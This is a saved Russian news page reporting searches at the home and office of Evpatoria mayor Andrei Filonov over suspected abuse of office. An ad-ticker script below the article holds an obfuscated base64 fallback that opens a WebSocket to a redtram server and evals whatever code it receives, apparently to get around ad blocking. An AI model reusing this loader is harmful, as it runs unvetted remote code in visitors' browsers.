<!DOCTYPE html>
<html>
<head>
	<title>У мэра Евпатории Андрея Филонова проходят обыски | Капитал страны</title>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta name="description" content="" />
		<meta property="og:type" content="article" />	<meta property="og:url" content="http://kapital-rus.ru/news/368444-u_mera_evpatorii_andreya_filonova_prohodyat_obyski/" />	<meta property="og:title" content="У мэра Евпатории Андрея Филонова проходят обыски | Капитал страны" />
	<link rel="icon" href="/favicon.gif" type="image/gif" />
	<link rel="shortcut icon" href="/favicon.gif" type="image/gif" />
	<link rel="apple-touch-icon-precomposed" href="/touch-icon-iphone.png">
	<link rel="apple-touch-icon-precomposed" sizes="76x76" href="/touch-icon-ipad.png">
	<link rel="apple-touch-icon-precomposed" sizes="120x120" href="/touch-icon-iphone-retina.png">
	<link rel="apple-touch-icon-precomposed" sizes="152x152" href="/touch-icon-ipad-retina.png">
	<meta name=viewport content="width=device-width, initial-scale=1">
	<link rel="alternate" type="application/rss+xml" href="/upload/kaprus.xml/" title="Капитал страны" />
	<meta name="robots" content="all">
	<link rel="stylesheet" type="text/css" href="/site.css?281220182024">

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-5827894687258539",
    enable_page_level_ads: true
  });
</script>

	
	<script src="/lga/silicium/js/jquery/jquery-1.4.4.min.js" type="text/javascript"></script>
	<script src="/inc2/common/js/jQuery_Form_Plugin/jquery.form.min.js" type="text/javascript"></script>
	<script src="/inc2/common/js/site.js?dt=260320190501" type="text/javascript"></script>
	<!-- <script src="//load.sumome.com/" data-sumo-site-id="a7798791a132d695dc5a7b7c87d432993c7c724f9ebb6ef198e61988b2f7ff92" async="async"></script> -->

	<script>
		jQuery(function(){
						jQuery("head").append('<link rel="stylesheet" href="/lga/silicium/js/jquery/jquery-ui-1.8.6.custom.css" type="text/css" media="all" />');

						$$("a.news_list__item__title span").each(function(){
				var t = $$(this)
				t.html(shy(t.text()))
			})

						$$(".news_list__item .w60")
				.mouseover(function(){
					$$(this).parent().parent().find(".news_list__item__title").css({"text-decoration":"underline", "color":"red"})
				})
				.mouseout(function(){
					$$(this).parent().parent().find(".news_list__item__title").css({"text-decoration":"none", "color":"#3a3a3b"})
				})

		})//DOM Loaded
	</script>


<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-5827894687258539",
          enable_page_level_ads: true
     });
</script>


<!-- Facebook Pixel Code -->
<script>
!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
document,'script','https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1874814836105833'); // Insert your pixel ID here.
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=1874814836105833&ev=PageView&noscript=1"
/></noscript>
<!-- DO NOT MODIFY -->
<!-- End Facebook Pixel Code -->

</head>
<body>
<div id="main">
	<header>
		<div class="head">
			<div class="kstext"><span class="w1">Капитал</span> <span class="w2">страны</span></div>
			<div class="logo_container_top">
				<a href="/"><img src="/img2/kapital-logo.png" alt="Капитал Страны" /></a>
			</div>
			<div class="alternate_header">
				<!-- <a class="bannerHeader123x62" href="/tags/вэф2018"><img src="/img/2018/banners/vef2018.png" alt="Восточный экономический форум"></a> -->
				<a href="/"><img class="aLogo" src="/img2/bottom-logo.png" alt="Капитал Страны" /></a>
				<a class="english" href="https://www.facebook.com/NatsCap/">ENGLISH</a>
				<div id="bMiniMenuWrapper" class="clear">
					<div id="bMiniMenue"> <img src="/img/bMiniMenue2.png"> </div>
					<div class="blue_menu_top"></div>
					<script>
						jQuery(function(){
							jQuery('#bMiniMenuWrapper .blue_menu_top').html(jQuery('.blue_menu_top nav').html())
							var li = jQuery('#bMiniMenuWrapper .blue_menu_top ul li')
							li.eq(0).after('<li><a href="/news/">Новости</a></li>')
							jQuery("#bMiniMenue").toggle(function() {
								jQuery("#bMiniMenuWrapper .blue_menu_top").show()
							}, function() {
								jQuery("#bMiniMenuWrapper .blue_menu_top").hide()
							});
						})//DOM loaded
					</script>
				</div><!-- .bMiniMenuWrapper -->
				<div class="curses_top">
					<div class="curses-date">
					<b>03 АПР, 10:04 МСК</b>
					</div>
					<div class="curses-val">
					USD (ЦБ)&nbsp;&nbsp;&nbsp;&nbsp;<span>65,4726</span>
					</div>
					<div class="curses-val">
					EUR (ЦБ)&nbsp;&nbsp;&nbsp;&nbsp;<span>73,3162</span>
					</div>
				</div><!-- .curses_top -->
			</div><!-- .alternate_header -->

			<div class="small_soc_button_top">
				<a href="https://twitter.com/kapital_strany" target="_blank" class="icon-soc i-twitter"></a>
				<a href="https://vk.com/kapitalstrany" target="_blank" class="icon-soc i-vk"></a>
				<a href="https://www.facebook.com/KAPITALRUS/" target="_blank" class="icon-soc i-facebook"></a>
				<a href="https://ok.ru/group/55461730648312" target="_blank" class="icon-soc i-ok"></a>
				<a href="https://www.instagram.com/capital.of.the.country/" target="_blank" class="icon-soc i-instagram"></a>
				<a href="https://zen.yandex.ru/kapital-rus.ru" target="_blank" class="icon-soc i-zen"></a>
				<a href="/upload/kaprus.xml/" target="_blank" class="icon-soc i-rss"></a>
				<a href="https://www.facebook.com/NatsCap/" target="_blank" class="icon-soc i-facebook-eng"></a>
				<br>
				<div class="curses_top">
					<div class="curses-date">
					<b>03 АПР, 10:04 МСК</b>
					</div>
					<div class="curses-val">
					USD (ЦБ)&nbsp;&nbsp;&nbsp;&nbsp;<span>65,4726</span>
					</div>
					<div class="curses-val">
					EUR (ЦБ)&nbsp;&nbsp;&nbsp;&nbsp;<span>73,3162</span>
					</div>
				</div><!-- .curses_top -->
			</div>


			<div class="search_and_links_top">
				<div class="clear"></div>
			</div>
		</div>
		<div class="clear"></div>
		<div id="mainMenue" class="blue_menu_top">
			<nav>
				<ul>
					<li><a href="/">Главное</a></li>
					<li><a href="/articles/C305/">События</a></li>
					<li><a href="/lite/">Тренды</a></li>
					<li><a href="/articles/C10/">Общество</a></li>
					<li><a href="/articles/C17/">Аналитика</a></li>
					<li><a href="/ratings/">Рейтинги</a></li>
					<li><a href="/articles/C301/">Психология</a></li>					<li><a href="/uznai/">Узнай, страна!</a></li>
					<li><a href="/about/">О нас</a></li>
				</ul>
			</nav>
			<div class="sixteenplus"><span>16+</span></div>
		</div>
		<!-- <a class="bannerHeader123x62" href="/tags/вэф2018/"><img src="/img/2018/banners/vef2018.png" alt="Восточный экономический форум"></a> -->
	</header>




<div class="three-coll">
		<div class="main-lenta three-coll__coll">
			<div class="main-lenta__content"><article class="newsbody">
<h1>У мэра Евпатории Андрея Филонова проходят обыски</h1>
<div id="dtline"> <span>03.04.2019 09:54</span><br /> </div>
<div id="mainPhoto"><img style="max-width:100%" src="/img/2019/news/368444.jpg" alt="У мэра Евпатории Андрея Филонова проходят обыски" title="У мэра Евпатории Андрея Филонова проходят обыски"></div><div class="textBodyNews">
<p>Следственные действия проходят на рабочем месте и дома, где проживает мэр Евпатории Андрей Филонов (эту должность он занимает с 2014 года), передает РИА Новости со ссылкой на сообщение управления ФСБ по Крыму и Севастополю. Как отмечается, градоначальника подозревают в превышении должностных полномочий с причинением тяжких последствий.</p>

<p>Ранее сообщалось о том, что в судебном порядке было вынесено решение об увольнении мэра: соответствующий иск был подан представителями прокуратуры. Главным поводом послужил следующий факт: Филонов назначил отца своей гражданской супруги директором одного из муниципальных учреждений.</p>
</div>

<div class="next_read_wrapper">
	<a href="/news/368408-vladimir_putin_uvolil_prokurora_karachaevocherkesii/" style="margin-right: 20px;"><img class="preview" src="/img/2019/news/368408.jpg" alt="Владимир Путин уволил прокурора Карачаево-Черкесии"></a>
	<div class="links">
		<div>Читать еще:</div>
		<div> <a href="/news/368408-vladimir_putin_uvolil_prokurora_karachaevocherkesii/">Владимир Путин уволил прокурора Карачаево-Черкесии</a> </div>
	</div>
</div>
<div class="lineundernews">
	<div class="emailTo_and_allNews">
		<a href="mailto:?subject=У мэра Евпатории Андрея Филонова проходят обыски&body=http%3A%2F%2Fkapital-rus.ru%2Fnews%2F368444-u_mera_evpatorii_andreya_filonova_prohodyat_obyski%2F%0A">✉ переслать на email</a>
		<span class="b"><a href="/news/">Все новости</a> &gt; </span>
	</div>

<style>
	.lineundernews {}
	.lineundernews .a { vertical-align: middle; }
	.lineundernews .l { float: left; }
	.lineundernews .r { text-align: right; float:right;}
	.lineundernews .n { padding-left: 50px; font-style: italic; white-space: nowrap; font-size: 17px; text-align: right; }
	.lineundernews .emailTo_and_allNews { display: flex; justify-content: space-between; align-items: center; }
	.lineundernews .emailTo_and_allNews a:link { color: #0074b7; }
	.lineundernews .tbl { display: table; width: 100%; margin-top: 7px; }
</style>

	<div class="subscribe_on_ks_yandex">
		<a href="https://zen.yandex.ru/kapital-rus.ru" target="_blank"><img src="/img/read_us_zen.png" alt="Капитал страны в Яндекс Дзен"></a>
		<a href="https://news.yandex.ru/index.html?from=rubric&favid=5292" class="yandexNews" target="_blank"><img src="/img/read_us_ynews.png" alt="Капитал страны в Яндекс Новости"></a>
	</div>

<script class="r37076" type="text/javascript">
    (function() {
        var worker37076,
            tickerID = 37076,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r37076'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's37076');
            script.setAttribute('data-idn', idn);
            script.src = '//1rt0n.news/ru-n4p/0/37/ticker_37076.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker37076.postMessage(data);
                }

                worker37076 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker37076.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker37076.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>








		<div style="display: flex; justify-content: space-around; align-items: flex-end; flex-wrap: wrap;">
		<div class="share_block">
	<style> .ya-share2__list_direction_horizontal > .ya-share2__item {padding-right: 10px; } </style>
	<script type="text/javascript" src="//yastatic.net/es5-shims/0.0.2/es5-shims.min.js" charset="utf-8"></script>
	<script type="text/javascript" src="//yastatic.net/share2/share.js" charset="utf-8"></script>
	<div class="ya-share2" data-services="vkontakte,facebook,twitter,gplus,linkedin,odnoklassniki,lj,viber,whatsapp" data-counter=""></div>
</div><!-- .share_block -->
		<div style="text-align:center; margin-top: 12px;">
			<form target="_top" action="http://subscribe.ru/member/quick" method="get"> <input type="hidden" name="action" value="quick"> <input type="hidden" name="src" value="list_economics.news.investwithus"> <table width="100%" border="0" cellspacing="0" cellpadding="2" width="250px"> <tr> <td bgcolor="#ffffff" align="center" valign="middle"> <INPUT TYPE=hidden NAME=grp VALUE="economics.news.investwithus"> </td> </tr> <tr> <td bgcolor="#ffffff" align="center" valign="middle"> <input type="text" name="email" size="20" maxlength="100" value="ваш e-mail" placeholder="Ваш e-mail" style="font-size: 9pt; font-family: Trebuchet MS" onFocus="this.value = '';return false;"><input type="submit" value="Подписаться на рассылку" style="font-size: 9pt; font-family: Trebuchet MS"></td> </tr> </table> </form>
		</div>
	</div>
	<span id="addnewcomment"></span>
</div>
</article>







<div id="comments">
	<h4 class="write_comment_h" style="padding-top:16px">Написать комментарий</h4>


<style>
	#bResetFormComment { position:absolute; top:10px; right:9px; display:none; cursor:pointer }
	#newCommentTEXT {width: 100%}
	#rowFIOEMAIL {
		padding-top: 10px;
		padding-bottom: 20px;
		display:none;
	}
	#rowFIOEMAIL input {
		width: 48%;
		border:1px solid #cfcfcf;
		border-radius:4px;
		box-sizing: border-box;
		padding:4px 15px;
		font-family:Calibri, Tahoma, sans serif;
		font-size:16px;
		-webkit-box-shadow: 2px 2px 3px 0px rgba(0,0,0,0.3);
		-moz-box-shadow: 2px 2px 3px 0px rgba(0,0,0,0.3);
		box-shadow: 2px 2px 3px 0px rgba(0,0,0,0.3);
	}
	#newCommentFIO{
		float: left;
	}
	#newCommentEMAIL{
		float: right;
	}
	#h_rules {text-align: center; font-size: 12px; padding-top: 44px;}
	#h_rules span {border-bottom: 1px black dotted; cursor:pointer;}
	#comment_rules {
		display:none;
		background-color: #fcfada;
		text-align:left;
		padding:10px;
		font-size: 12px;
	}
</style>


	<div class="comment_form_and_avatar" style="position:relative">
		<img src="/img2/empty-ava.png" class="avatar" />
		<form>
			<textarea id="newCommentTEXT" placeholder="А что вы думаете об этом?"></textarea>
			<img id="bResetFormComment" src="/img/bclose.png"  />
			<div id="rowFIOEMAIL">
				<input id="newCommentFIO" type="text" value="" placeholder="Представьтесь" />
				<input id="newCommentEMAIL" type="text" value="" placeholder="Ваш Email" />
				<noindex>
				<div id="h_rules"><span>правила комментирования</span></div>
				<div style="text-align:center"><a href="/protection/" target="_blank">Положение о защите персональных данных</a></div>
				<div id="comment_rules">
					<ol>
						<li>Не оскорблять участников общения в любой форме. Участники должны соблюдать уважительную форму общения.</li>
						<li>Не использовать в комментарии нецензурную брань или эвфемизмы, обсценную лексику и фразеологию, включая завуалированный мат, а также любое их цитирование.</li>
						<li>Не публиковать рекламные сообщения и спам; сообщения коммерческого характера; ссылки на сторонние ресурсы в рекламных целях. В ином случае комментарий может быть допущен в редакции без ссылок по тексту либо удален.</li>
						<li>Не использовать комментарии как почтовую доску объявлений для сообщений приватного характера, адресованного конкретному участнику.</li>
						<li>Не проявлять расовую, национальную и религиозную неприязнь и ненависть, в т.ч. и презрительное проявление неуважения и ненависти к любым национальным языкам, включая русский; запрещается пропагандировать терроризм, экстремизм, фашизм, наркотики и прочие темы, несовместимые с общепринятыми законами, нормами морали и приличия.</li>
						<li>Не использовать в комментарии язык, отличный от литературного русского.</li>
						<li>Не злоупотреблять использованием СПЛОШНЫХ ЗАГЛАВНЫХ букв (использованием Caps Lock).</li>
					</ol>
				</div>
				</noindex>
				<div id="newCommentSendComment" class="show_more_comments">
					<i class="send_comment_ico"></i>Отправить комментарий
				</div>
			</div>
		</form>
	</div>


</div><!-- #comments -->

<div id="commenSentDialog" style="display:none" title="Комментарий отправлен">
	<p><span style="font-size:130%; color:green"><b>Ваш комментарий</b> успешно <b>отправлен на модерацию</b></span> и вскоре будет опубликован в случае отсутствия нарушений правил комментирования.</p>
	<p>Благодарим за Ваше мнение.</p>
</div>
<div id="commenSentDialogError" style="display:none" title="Ошибка"><p style="color:red">При отправке комментария произошла <b>ошибка</b>.</p><p>Попробуйте повторить позднее.</p></div>



<section class="read_more">
<h1>Статьи</h1>
	<div class="article_preview cart_article">
		<div class="article_preview__img_container">
		<h2><a href="/articles/article/kak_izmenit_svou_jizn_poshagovaya_instrukciya/">Как изменить свою жизнь? Пошаговая инструкция</a></h2>
			<a href="/articles/article/kak_izmenit_svou_jizn_poshagovaya_instrukciya/">
				<img class="article_img" src="/img/articles/284779_m.jpg" alt="Как изменить свою жизнь? Пошаговая инструкция" title="Как изменить свою жизнь? Пошаговая инструкция" />
			</a>
			<div class="article_preview__info">
								<a href="/articles/C301/"><span class="rubric">Бизнес и психология</span></a>
											</div>
		</div>
	</div>
	<div class="article_preview cart_article">
		<div class="article_preview__img_container">
		<h2><a href="/articles/article/nauchnotehnicheskii_progress__vsemirnoe_blago_ili_zamedlennaya_bomba_pod_ch/">Научно-технический прогресс – всемирное благо или замедленная бомба под человечеством?</a></h2>
			<a href="/articles/article/nauchnotehnicheskii_progress__vsemirnoe_blago_ili_zamedlennaya_bomba_pod_ch/">
				<img class="article_img" src="/img/articles/284750_m.jpg" alt="Научно-технический прогресс – всемирное благо или замедленная бомба под человечеством?" title="Научно-технический прогресс – всемирное благо или замедленная бомба под человечеством?" />
			</a>
			<div class="article_preview__info">
								<a href="/articles/C18/"><span class="rubric">Наука и технологии</span></a>
				<a href="/articles/article/nauchnotehnicheskii_progress__vsemirnoe_blago_ili_zamedlennaya_bomba_pod_ch/#comments"><span class="comment"><i class="comment_ico"></i> 3</span></a>							</div>
		</div>
	</div>
	<div class="article_preview cart_article">
		<div class="article_preview__img_container">
		<h2><a href="/articles/article/reforma_v_stroitelnoi_otrasli_natolknulas_na_probely_v_zakonodatelstve/">Реформа в строительной отрасли натолкнулась на пробелы в законодательстве</a></h2>
			<a href="/articles/article/reforma_v_stroitelnoi_otrasli_natolknulas_na_probely_v_zakonodatelstve/">
				<img class="article_img" src="/img/articles/284745_m.jpg" alt="Реформа в строительной отрасли натолкнулась на пробелы в законодательстве" title="Реформа в строительной отрасли натолкнулась на пробелы в законодательстве" />
			</a>
			<div class="article_preview__info">
								<a href="/articles/C306/"><span class="rubric">Интервью и комментарии</span></a>
											</div>
		</div>
	</div>
	<div class="article_preview cart_article">
		<div class="article_preview__img_container">
		<h2><a href="/articles/article/vyiti_iz_zony_komforta_kak_otkazatsya_ot_degradacii_i_nachat_razvivatsya/">Выйти из «зоны комфорта». Как отказаться от деградации и начать развиваться</a></h2>
			<a href="/articles/article/vyiti_iz_zony_komforta_kak_otkazatsya_ot_degradacii_i_nachat_razvivatsya/">
				<img class="article_img" src="/img/articles/284699_m.jpg" alt="Выйти из «зоны комфорта». Как отказаться от деградации и начать развиваться" title="Выйти из «зоны комфорта». Как отказаться от деградации и начать развиваться" />
			</a>
			<div class="article_preview__info">
								<a href="/articles/C301/"><span class="rubric">Бизнес и психология</span></a>
				<a href="/articles/article/vyiti_iz_zony_komforta_kak_otkazatsya_ot_degradacii_i_nachat_razvivatsya/#comments"><span class="comment"><i class="comment_ico"></i> 4</span></a>							</div>
		</div>
	</div>
	<div class="article_preview cart_article">
		<div class="article_preview__img_container">
		<h2><a href="/articles/article/socialnoe_poslanie_kto_vyigraet_ot_obeschanii_putina_i_chto_mojno_poluchit/">«Социальное послание». Кто выиграет от обещаний Путина и что можно получить</a></h2>
			<a href="/articles/article/socialnoe_poslanie_kto_vyigraet_ot_obeschanii_putina_i_chto_mojno_poluchit/">
				<img class="article_img" src="/img/articles/284670_m.jpg" alt="«Социальное послание». Кто выиграет от обещаний Путина и что можно получить" title="«Социальное послание». Кто выиграет от обещаний Путина и что можно получить" />
			</a>
			<div class="article_preview__info">
								<a href="/articles/C22/"><span class="rubric">Экономика</span></a>
				<a href="/articles/article/socialnoe_poslanie_kto_vyigraet_ot_obeschanii_putina_i_chto_mojno_poluchit/#comments"><span class="comment"><i class="comment_ico"></i> 2</span></a>							</div>
		</div>
	</div>
	<div class="article_preview cart_article">
		<div class="article_preview__img_container">
		<h2><a href="/articles/article/prirodnaya_agressivnost_kak_spravitsya_s_razrushauschei_nas_energiei/">Природная агрессивность. Как справиться с разрушающей нас энергией</a></h2>
			<a href="/articles/article/prirodnaya_agressivnost_kak_spravitsya_s_razrushauschei_nas_energiei/">
				<img class="article_img" src="/img/articles/284668_m.jpg" alt="Природная агрессивность. Как справиться с разрушающей нас энергией" title="Природная агрессивность. Как справиться с разрушающей нас энергией" />
			</a>
			<div class="article_preview__info">
								<a href="/articles/C301/"><span class="rubric">Бизнес и психология</span></a>
											</div>
		</div>
	</div>
</section>

<section class="read_more">
	<h1>Узнай, страна</h1>
	<div class="article_preview cart_article">
		<div class="article_preview__img_container">
		<h2><a href="/uznai/news/birjevoj_rnok_zerna_otkrvaet_dlia_tambovskih_agrariev_nove_vozmojnosti/">Биржевой рынок зерна открывает для тамбовских аграриев новые возможности</a></h2>
			<a href="/uznai/news/birjevoj_rnok_zerna_otkrvaet_dlia_tambovskih_agrariev_nove_vozmojnosti/">
				<img class="article_img" src="/img/uznai/2013/8378_m.jpg" alt="Биржевой рынок зерна открывает для тамбовских аграриев новые возможности" title="Биржевой рынок зерна открывает для тамбовских аграриев новые возможности" />
			</a>
					</div>
	</div>
	<div class="article_preview cart_article">
		<div class="article_preview__img_container">
		<h2><a href="/uznai/news/v_primore_sudostroitelnaia_verf_zvezda_perejdet_na_otechestvennuu_stal__/">В Приморье судостроительная верфь «Звезда» перейдет на отечественную сталь  </a></h2>
			<a href="/uznai/news/v_primore_sudostroitelnaia_verf_zvezda_perejdet_na_otechestvennuu_stal__/">
				<img class="article_img" src="/img/uznai/2013/8377_m.jpg" alt="В Приморье судостроительная верфь «Звезда» перейдет на отечественную сталь  " title="В Приморье судостроительная верфь «Звезда» перейдет на отечественную сталь  " />
			</a>
					</div>
	</div>
	<div class="article_preview cart_article">
		<div class="article_preview__img_container">
		<h2><a href="/uznai/news/tulskaia_oblast_predostavliaet_ploschadku_pod_stroitelstvo_kitajskogo_avtozavoda_/">Тульская область предоставляет площадку под строительство китайского автозавода </a></h2>
			<a href="/uznai/news/tulskaia_oblast_predostavliaet_ploschadku_pod_stroitelstvo_kitajskogo_avtozavoda_/">
				<img class="article_img" src="/img/uznai/2013/8376_m.jpg" alt="Тульская область предоставляет площадку под строительство китайского автозавода " title="Тульская область предоставляет площадку под строительство китайского автозавода " />
			</a>
					</div>
	</div>
	<div class="article_preview cart_article">
		<div class="article_preview__img_container">
		<h2><a href="/uznai/news/v_tomskoj_oblasti_zavod_mdf_budet_rabotat_v_zamknutom_proizvodstvennom_cikle/">В Томской области завод МДФ будет работать в замкнутом производственном цикле</a></h2>
			<a href="/uznai/news/v_tomskoj_oblasti_zavod_mdf_budet_rabotat_v_zamknutom_proizvodstvennom_cikle/">
				<img class="article_img" src="/img/uznai/2013/8375_m.jpg" alt="В Томской области завод МДФ будет работать в замкнутом производственном цикле" title="В Томской области завод МДФ будет работать в замкнутом производственном цикле" />
			</a>
					</div>
	</div>
</section>








<script>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</script>

			</div>
		</div><section class="news-lenta three-coll__coll">
	<div class="news-lenta__content">
		<div class="news-lenta__news_list">
			<div class="news_list_header">
				<h2><a href="/news/">Новости дня</a></h2>
			</div>
			<div class="news_list__content">
				<div class="news_list__item">
					<span class="news_list__item__date">09:16</span>
					<a href="/news/368443-esli_zelenskii_pobedit_to_saakashvili_vernetsya_na_ukrainu/"><img class="w60" src="/img/2019/news/368443_m.jpg" alt="Если Зеленский победит, то Саакашвили вернется на Украину"></a>					<a class="news_list__item__title" href="/news/368443-esli_zelenskii_pobedit_to_saakashvili_vernetsya_na_ukrainu/"><span>Если Зеленский победит, то Саакашвили вернется на Украину</span></a>
				</div>
<style>
	.trendNC {background-color: #003663; padding: 9px; margin-bottom: 22px; }
	.trendNC a {color:white; font-family: 'russiabold', tahoma, sans serif; font-size: 16px; font-weight: bold; text-decoration: none; }
	.trendNC .im img { width:192px; }
</style>
<div class="trendNC">
	<div class="im"><a href="/news/368352-kakie_rossiiskie_zakony_vstupaut_v_silu_1_aprelya/"><img src="/img/2019/news/368352_m.jpg" alt="С первого апреля в России повышают пенсии, дают скидки и свободу выбора автовладельцам"></a></div>
	<div class="a"><a href="/news/368352-kakie_rossiiskie_zakony_vstupaut_v_silu_1_aprelya/" class="news_list__item__title">С первого апреля в России повышают пенсии, дают скидки и свободу выбора автовладельцам</a></div>
</div>

<script>
$$(function(){
	$$(".trendNC .im, .trendNC .a")
		.mouseover(function(){$$(this).parent().css({"text-decoration":"underline"})})
		.mouseout(function(){$$(this).parent().css({"text-decoration":"none"})})
})
</script>
				<div class="news_list__item">
					<span class="news_list__item__date">08:23</span>
					<a href="/news/368442-tramp_snova_trebuet_ot_nato_uvelichit_rashody/"><img class="w60" src="/img/2019/news/368442_m.jpg" alt="Трамп снова требует от НАТО увеличить расходы"></a>					<a class="news_list__item__title" href="/news/368442-tramp_snova_trebuet_ot_nato_uvelichit_rashody/"><span>Трамп снова требует от НАТО увеличить расходы</span></a>
				</div>
				<div class="news_list__item">
					<span class="news_list__item__date">07:54</span>
					<a href="/news/368441-fas_predlagaet_otmenit_komissiu_za_snyatie_nalichnyh/"><img class="w60" src="/img/2019/news/368441_m.jpg" alt="ФАС предлагает отменить комиссию за снятие наличных"></a>					<a class="news_list__item__title" href="/news/368441-fas_predlagaet_otmenit_komissiu_za_snyatie_nalichnyh/"><span>ФАС предлагает отменить комиссию за снятие наличных</span></a>
				</div>
				<div class="news_list__item">
					<span class="news_list__item__date">07:39</span>
					<a href="/news/368440-razrabotchikov_kosmicheskogo_korablya_federaciya_uvolili_za_neradivo/"><img class="w60" src="/img/2019/news/368440_m.jpg" alt="Разработчиков космического корабля &quot;Федерация&quot; уволили за нерадивость"></a>					<a class="news_list__item__title" href="/news/368440-razrabotchikov_kosmicheskogo_korablya_federaciya_uvolili_za_neradivo/"><span>Разработчиков космического корабля "Федерация" уволили за нерадивость</span></a>
				</div>
				<div class="news_list__item">
					<span class="news_list__item__date">07:19</span>
					<a href="/news/368439-v_rossii_zapretyat_mikrokreditovanie_pod_zalog_jilya/"><img class="w60" src="/img/2019/news/368439_m.jpg" alt="В России запретят микрокредитование под залог жилья"></a>					<a class="news_list__item__title" href="/news/368439-v_rossii_zapretyat_mikrokreditovanie_pod_zalog_jilya/"><span>В России запретят микрокредитование под залог жилья</span></a>
				</div>
				<div class="news_list__item">
					<span class="news_list__item__date">06:52</span>
					<a href="/news/368438-v_rossiu_prekratyat_vvodit_nekotorye_lekarstvennye_preparaty/"><img class="w60" src="/img/2019/news/368438_m.jpg" alt="В Россию прекратят ввозить некоторые лекарственные препараты"></a>					<a class="news_list__item__title" href="/news/368438-v_rossiu_prekratyat_vvodit_nekotorye_lekarstvennye_preparaty/"><span>В Россию прекратят ввозить некоторые лекарственные препараты</span></a>
				</div>
<style>
	.trendNC {background-color: #003663; padding: 9px; margin-bottom: 22px; }
	.trendNC a {color:white; font-family: 'russiabold', tahoma, sans serif; font-size: 16px; font-weight: bold; text-decoration: none; }
	.trendNC .im img { width:192px; }
</style>
<div class="trendNC">
	<div class="im"><a href="/articles/article/nacionalnyi_proekt_nauka_podgotovit_35_tys_issledovatelei_mask_zapuskaet_sp/"><img src="/img/articles/284487.jpeg" alt="Национальный проект «Наука» подготовит 35 тыс. исследователей, Маск запускает спутниковый интернет и другие новости среды"></a></div>
	<div class="a"><a href="/articles/article/nacionalnyi_proekt_nauka_podgotovit_35_tys_issledovatelei_mask_zapuskaet_sp/" class="news_list__item__title">Национальный проект «Наука» подготовит 35 тыс. исследователей, Маск запускает спутниковый интернет и другие новости среды</a></div>
</div>

<script>
$$(function(){
	$$(".trendNC .im, .trendNC .a")
		.mouseover(function(){$$(this).parent().css({"text-decoration":"underline"})})
		.mouseout(function(){$$(this).parent().css({"text-decoration":"none"})})
})
</script>
				<div class="news_list__item">
					<span class="news_list__item__date">06:29</span>
					<a href="/news/368437-nato_garantiruut_prohod_sudov_ukrainy_cherez_kerchenskii_proliv/"><img class="w60" src="/img/2019/news/368437_m.jpg" alt="НАТО гарантирует проход судов Украины через Керченский пролив"></a>					<a class="news_list__item__title" href="/news/368437-nato_garantiruut_prohod_sudov_ukrainy_cherez_kerchenskii_proliv/"><span>НАТО гарантирует проход судов Украины через Керченский пролив</span></a>
				</div>
			</div>

			<div class="news_list_header">
				<h2><a href="/uznai/">Узнай, страна!</a></h2>
			</div>
			<div class="news_list__content">
				<div class="news_list__item">
					<span class="news_list__item__date">08:54</span>
